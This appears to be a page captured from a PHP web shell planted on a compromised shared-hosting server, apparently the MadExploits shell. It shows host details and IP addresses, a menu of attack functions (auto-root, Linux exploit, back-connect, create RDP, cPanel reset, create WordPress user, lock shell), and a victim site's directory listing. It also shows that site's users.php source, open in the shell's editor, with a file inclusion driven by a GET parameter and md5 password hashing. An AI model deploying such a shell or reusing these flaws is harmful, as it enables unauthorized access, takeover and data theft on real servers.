Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.160
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
contract.tradesense.co.ke /
[ HOME SHELL ]
Name
Size
Permission
Action
Majestic_Document_Generator
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
style
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxr-xr-x
.gitignore
8
B
-rw-r--r--
LICENSE
1.07
KB
-rw-r--r--
Majestic_Document_Generator.zi...
4.8
MB
-rw-r--r--
archivex8LBD.tar.gz
14.31
MB
-rw-r--r--
auth.php
3.04
KB
-rw-r--r--
contract
4.8
MB
-rw-r--r--
documents.php
6.21
KB
-rw-r--r--
error_log
1.1
MB
-rw-r--r--
help.php
1.92
KB
-rw-r--r--
index.php
3.02
KB
-rw-r--r--
recent.php
3.88
KB
-rw-r--r--
settings.php
3.46
KB
-rw-r--r--
userdetails.php
786
B
-rw-r--r--
users.php
3.75
KB
-rw-r--r--
view.php
318
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : users.php
<?php include "inc/App.php"; $user->Protect(); $menu = 'users'; $file = 'list'; if (isset($_GET['menu'])) $file = $_GET['menu']; if (isset($_POST['add_role'])) { #print_R($_POST); $post = $form->get_post_data(array('name', 'color', 'zones')); $post['zones'] = serialize($post['zones']); if (isset($_GET['edit'])) { $db->update($post, 'roles', array('id' => $_GET['edit'])); $error['type'] = 'success'; $error['message'] = "<strong>Success!</strong> The user role has been updated!"; } else { $db->insert($post, 'roles'); $error['type'] = 'success'; $error['message'] = "<strong>Success!</strong> The user role has been added!"; } } if (isset($_POST['add_user'])) { #print_R($_POST); $post = $form->get_post_data(array('name', 'surname', 'password', 'role', 'email', 'username')); $post['password'] = md5($post['password']); $post['date'] = time(); if (isset($_GET['edit'])) { if (!$_POST['password']) unset($post['password']); $db->update($post, 'users', array('id' => $_GET['edit'])); $error['type'] = 'success'; $error['message'] = "<strong>Success!</strong> The user has been updated!"; } else { $db->insert($post, 'users'); $error['type'] = 'success'; $error['message'] = "<strong>Success!</strong> The user has been added!"; } } if ($_GET['edit'] === $user->userinfo->id) { $error['type'] = 'warning'; $error['message'] = "<strong>Warning!</strong> Due to security reasons, you cannot change user settings for your own user"; $cannotEdit = true; } ?> <!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0"/> <title>Users | DocGen</title> <!-- CSS --> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet"> <link href="style/css/materialize.css" type="text/css" rel="stylesheet" media="screen,projection"/> <link href="style/css/style.css" type="text/css" rel="stylesheet" media="screen,projection"/> <link href="style/css/dataTables.bootstrap.css" type="text/css" media="screen, projection" rel="stylesheet"/> <!-- Scripts--> <script src="https://code.jquery.com/jquery-2.1.1.min.js"></script> <script src="style/js/materialize.js"></script> <script src="style/js/init.js"></script> <link rel="icon" type="image/png" href="style/images/favicon.png"/> </head> <body> <?php include "inc/commons/header.php"; ?> <main> <div class="card-panel blue-grey darken-4"> <span class="white-text text-darken-2"><h5><i class="material-icons">accessibility</i> <span id='pageTitle'>Users</span></h5></span> </div> <?php include "inc/commons/messages.php"; ?> <div class="container" id='big'> <div id="docBase" class='row'> <div class="card-panel z-depth-1" id="formDoc"> <span class="black-text"> <?php include "inc/views/users/" . $file . ".php"; ?> </span> </div> </div> </div> </main> <script src="style/js/jquery.dataTables.js" type="text/javascript"></script> <script type="text/javascript"> $(function () { table1 = $('#dataTable').DataTable({ //bLengthChange:false, language: { search: "_INPUT_", searchPlaceholder: "Search...", sLengthMenu: "_MENU_" } }); $('select').material_select('destroy'); $('select').material_select(); }); </script> </body> </html>
Close